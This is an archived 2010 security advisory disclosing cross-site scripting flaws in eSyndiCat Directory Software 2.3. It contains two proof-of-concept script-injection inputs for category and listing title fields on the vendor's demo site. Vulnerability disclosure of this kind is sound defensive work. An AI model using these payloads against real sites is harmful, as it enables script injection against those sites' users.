eSyndiCat Directory Software 2.3 Cross Site Scripting

2010-11-27T00:00:00
ID PACKETSTORM:96181
Type packetstorm
Reporter d3v1l
Modified 2010-11-27T00:00:00

Description

                                        
                                            `-------------------------------------------------------------------------   
eSyndiCat Directory Software 2.3 - Cross-Site Scripting ( XSS )  
  
http://www.esyndicat.com/   
  
25 - 11 - 2010   
  
Avram Marius ( d3v1l )   
  
http://twitter.com/securityshell - http://security-sh3ll.blogspot.com  
  
--------------------------------------------------------------------------  
Poc: 1  
  
http://www.esyndicat.com/demo/suggest-category.php?id=364  
  
Suggest Category where inside Category title type something like "><script>alert('XSS')</script>   
  
  
Screen :   
  
http://twitpic.com/3aq5q8   
  
--------------------------------------------------------------------------  
  
Poc: 2   
  
http://www.esyndicat.com/demo/suggest-listing.php?id=0   
  
Suggest Listing where Fields Title can be "><script>alert('XSS')</script>   
  
  
Screen :   
  
http://twitpic.com/3aq7s0  
  
--------------------------------------------------------------------------  
`